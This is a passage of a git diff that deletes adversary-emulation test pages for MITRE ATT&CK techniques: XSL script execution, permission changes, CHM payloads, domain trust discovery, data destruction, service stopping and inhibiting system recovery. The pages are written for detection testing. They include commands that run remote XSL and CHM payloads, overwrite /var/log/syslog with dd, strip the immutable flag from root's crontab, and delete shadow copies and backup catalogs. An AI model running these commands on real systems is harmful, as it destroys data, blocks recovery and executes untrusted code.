-| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - WMIC bypass using local XSL file
-Executes the code specified within a XSL script using a local payload.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| wmic_command | WMI command to execute using wmic.exe | string | process list|
-| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder&#92;T1220&#92;src&#92;wmicscript.xsl|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: XSL file must exist on disk at specified location (#{local_xsl_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - WMIC bypass using remote XSL file
-Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| wmic_command | WMI command to execute using wmic.exe | string | process list|
-| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1222.md b/Atomic_Threat_Coverage/Triggers/T1222.md
deleted file mode 100644
index dad759b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1222.md
+++ /dev/null
@@ -1,441 +0,0 @@
-# T1222 - File and Directory Permissions Modification
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1222)
-<blockquote>File and directory permissions are commonly managed by discretionary access control lists (DACLs) specified by the file or directory owner. File and directory DACL implementations may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)
-
-Adversaries may modify file or directory permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions such as Administrator/root depending on the file or directory's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files/directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Take ownership using takeown utility](#atomic-test-1---take-ownership-using-takeown-utility)
-
-- [Atomic Test #2 - cacls - Grant permission to specified user or group recursively](#atomic-test-2---cacls---grant-permission-to-specified-user-or-group-recursively)
-
-- [Atomic Test #3 - attrib - Remove read-only attribute](#atomic-test-3---attrib---remove-read-only-attribute)
-
-- [Atomic Test #4 - chmod - Change file or folder mode (numeric mode)](#atomic-test-4---chmod---change-file-or-folder-mode-numeric-mode)
-
-- [Atomic Test #5 - chmod - Change file or folder mode (symbolic mode)](#atomic-test-5---chmod---change-file-or-folder-mode-symbolic-mode)
-
-- [Atomic Test #6 - chmod - Change file or folder mode (numeric mode) recursively](#atomic-test-6---chmod---change-file-or-folder-mode-numeric-mode-recursively)
-
-- [Atomic Test #7 - chmod - Change file or folder mode (symbolic mode) recursively](#atomic-test-7---chmod---change-file-or-folder-mode-symbolic-mode-recursively)
-
-- [Atomic Test #8 - chown - Change file or folder ownership and group](#atomic-test-8---chown---change-file-or-folder-ownership-and-group)
-
-- [Atomic Test #9 - chown - Change file or folder ownership and group recursively](#atomic-test-9---chown---change-file-or-folder-ownership-and-group-recursively)
-
-- [Atomic Test #10 - chown - Change file or folder mode ownership only](#atomic-test-10---chown---change-file-or-folder-mode-ownership-only)
-
-- [Atomic Test #11 - chown - Change file or folder ownership recursively](#atomic-test-11---chown---change-file-or-folder-ownership-recursively)
-
-- [Atomic Test #12 - chattr - Remove immutable file attribute](#atomic-test-12---chattr---remove-immutable-file-attribute)
-
-
-<br/>
-
-## Atomic Test #1 - Take ownership using takeown utility
-Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will
-be displayed for the folder and each file inside of it.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | %temp%&#92;T1222_takeown_folder|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-takeown.exe /f #{file_folder_to_own} /r
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Test requrires a file to take ownership of to be located at (#{file_folder_to_own})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-mkdir #{file_folder_to_own}
-echo T1222_takeown1 >> #{file_folder_to_own}\T1222_takeown1.txt
-echo T1222_takeown2 >> #{file_folder_to_own}\T1222_takeown2.txt
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - cacls - Grant permission to specified user or group recursively
-Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied"
-is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files"
-will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder to change permissions. | path | %temp%&#92;T1222_cacls|
-| user_or_group | User or group to allow full control | string | Everyone|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-Icacls.exe #{file_or_folder} /grant #{user_or_group}:F
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Test requrires a file to modifyto be located at (#{file_or_folder})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-mkdir #{file_or_folder}
-echo T1222_cacls1 >> #{file_or_folder}\T1222_cacls1.txt
-echo T1222_cacls2 >> #{file_or_folder}\T1222_cacls2.txt
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - attrib - Remove read-only attribute
-Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed.
-Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder remove attribute. | path | %temp%&#92;T1222_attrib|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-attrib.exe -r #{file_or_folder}\*.* /s
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Test requrires a file to modify to be located at (#{file_or_folder})
-##### Check Prereq Commands:
-```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-mkdir #{file_or_folder}
-echo T1222_attrib1 >> #{file_or_folder}\T1222_attrib1.txt
-echo T1222_attrib2 >> #{file_or_folder}\T1222_attrib2.txt
-attrib.exe +r #{file_or_folder}\T1222_attrib1.txt
-attrib.exe +r #{file_or_folder}\T1222_attrib2.txt
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - chmod - Change file or folder mode (numeric mode)
-Changes a file or folder's permissions using chmod and a specified numeric mode.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| numeric_mode | Specified numeric mode value | string | 755|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chmod #{numeric_mode} #{file_or_folder}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - chmod - Change file or folder mode (symbolic mode)
-Changes a file or folder's permissions using chmod and a specified symbolic mode.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| symbolic_mode | Specified symbolic mode value | string | a+w|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chmod #{symbolic_mode} #{file_or_folder}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - chmod - Change file or folder mode (numeric mode) recursively
-Changes a file or folder's permissions recursively using chmod and a specified numeric mode.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| numeric_mode | Specified numeric mode value | string | 755|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chmod #{numeric_mode} #{file_or_folder} -R
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - chmod - Change file or folder mode (symbolic mode) recursively
-Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| symbolic_mode | Specified symbolic mode value | string | a+w|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chmod #{symbolic_mode} #{file_or_folder} -R
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - chown - Change file or folder ownership and group
-Changes a file or folder's ownership and group information using chown.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml|
-| owner | Username of desired owner | string | root|
-| group | Group name of desired group | string | root|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chown #{owner}:#{group} #{file_or_folder}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - chown - Change file or folder ownership and group recursively
-Changes a file or folder's ownership and group information recursively using chown.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| owner | Username of desired owner | string | root|
-| group | Group name of desired group | string | root|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chown #{owner}:#{group} #{file_or_folder} -R
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - chown - Change file or folder mode ownership only
-Changes a file or folder's ownership only using chown.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222/T1222.yaml|
-| owner | Username of desired owner | string | root|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chown #{owner} #{file_or_folder}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - chown - Change file or folder ownership recursively
-Changes a file or folder's ownership only recursively using chown.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222|
-| owner | Username of desired owner | string | root|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-chown #{owner} #{file_or_folder} -R
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - chattr - Remove immutable file attribute
-Remove's a file's `immutable` attribute using `chattr`.
-This technique was used by the threat actor Rocke during the compromise of Linux web servers.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_modify | Path of the file | path | /var/spool/cron/root|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-chattr -i #{file_to_modify}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1223.md b/Atomic_Threat_Coverage/Triggers/T1223.md
deleted file mode 100644
index b5a4ae3..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1223.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# T1223 - Compiled HTML File
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1223)
-<blockquote>Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
-
-Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Compiled HTML Help Local Payload](#atomic-test-1---compiled-html-help-local-payload)
-
-- [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload)
-
-
-<br/>
-
-## Atomic Test #1 - Compiled HTML Help Local Payload
-Uses hh.exe to execute a local compiled HTML Help payload.
-Upon execution calc.exe will open
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| local_chm_file | Local .chm payload | path | PathToAtomicsFolder&#92;T1223&#92;src&#92;T1223.chm|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-hh.exe #{local_chm_file}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The payload must exist on disk at specified location (#{local_chm_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Compiled HTML Help Remote Payload
-Uses hh.exe to execute a remote compiled HTML Help payload.
-Upon execution displays an error saying the file cannot be open
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-hh.exe #{remote_chm_file}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1482.md b/Atomic_Threat_Coverage/Triggers/T1482.md
deleted file mode 100644
index 96b635d..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1482.md
+++ /dev/null
@@ -1,91 +0,0 @@
-# T1482 - Domain Trust Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1482)
-<blockquote>Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Windows - Discover domain trusts with dsquery](#atomic-test-1---windows---discover-domain-trusts-with-dsquery)
-
-- [Atomic Test #2 - Windows - Discover domain trusts with nltest](#atomic-test-2---windows---discover-domain-trusts-with-nltest)
-
-- [Atomic Test #3 - Powershell enumerate domains and forests](#atomic-test-3---powershell-enumerate-domains-and-forests)
-
-
-<br/>
-
-## Atomic Test #1 - Windows - Discover domain trusts with dsquery
-Uses the dsquery command to discover domain trusts.
-Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-dsquery * -filter "(objectClass=trustedDomain)" -attr *
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Windows - Discover domain trusts with nltest
-Uses the nltest command to discover domain trusts.
-Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
-This technique has been used by the Trickbot malware family.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-nltest /domain_trusts
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Powershell enumerate domains and forests
-Use powershell to enumerate AD information
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-NetDomainTrust
-Get-NetForestTrust
-Get-ADDomain
-Get-ADGroupMember Administrators -Recursive
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1485.md b/Atomic_Threat_Coverage/Triggers/T1485.md
deleted file mode 100644
index f7b2f8b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1485.md
+++ /dev/null
@@ -1,100 +0,0 @@
-# T1485 - Data Destruction
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1485)
-<blockquote>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
-
-Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
-
-To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
-
-- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-
-
-<br/>
-
-## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
-Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
-the powershell session along with other information about the file that was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
-| file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
-Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-Remove-Item $env:TEMP\SDelete.zip -Force
-```
-##### Description: The file to delete must exist at #{file_to_delete}
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item #{file_to_delete} -Force | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - macOS/Linux - Overwrite file with DD
-Overwrites and deletes a file using DD.
-To stop the test, break the command with CTRL/CMD+C.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
-| file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-dd of=#{file_to_overwrite} if=#{overwrite_source}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1489.md b/Atomic_Threat_Coverage/Triggers/T1489.md
deleted file mode 100644
index f135ba1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1489.md
+++ /dev/null
@@ -1,117 +0,0 @@
-# T1489 - Service Stop
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1489)
-<blockquote>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
-
-Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Windows - Stop service using Service Controller](#atomic-test-1---windows---stop-service-using-service-controller)
-
-- [Atomic Test #2 - Windows - Stop service using net.exe](#atomic-test-2---windows---stop-service-using-netexe)
-
-- [Atomic Test #3 - Windows - Stop service by killing process](#atomic-test-3---windows---stop-service-by-killing-process)
-
-
-<br/>
-
-## Atomic Test #1 - Windows - Stop service using Service Controller
-Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
-it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
-started by running the cleanup command.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| service_name | Name of a service to stop | String | spooler|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sc.exe stop #{service_name}
-```
-
-#### Cleanup Commands:
-```cmd
-sc.exe start #{service_name} >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Windows - Stop service using net.exe
-Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
-will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
-started by running the cleanup command.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| service_name | Name of a service to stop | String | spooler|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-net.exe stop #{service_name}
-```
-
-#### Cleanup Commands:
-```cmd
-net.exe start #{service_name} >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Windows - Stop service by killing process
-Stops a specified service killng the service's process.
-This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
-will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
-started by running the cleanup command.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| process_name | Name of a process to kill | String | spoolsv.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-taskkill.exe /f /im #{process_name}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1490.md b/Atomic_Threat_Coverage/Triggers/T1490.md
deleted file mode 100644
index d0bf847..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1490.md
+++ /dev/null
@@ -1,200 +0,0 @@
-# T1490 - Inhibit System Recovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1490)
-<blockquote>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
-
-A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
-
-* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
-* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
-* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
-* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code></blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
-
-- [Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI](#atomic-test-2---windows---delete-volume-shadow-copies-via-wmi)
-
-- [Atomic Test #3 - Windows - Delete Windows Backup Catalog](#atomic-test-3---windows---delete-windows-backup-catalog)
-
-- [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)
-
-- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
-
-- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
-
-
-<br/>
-
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
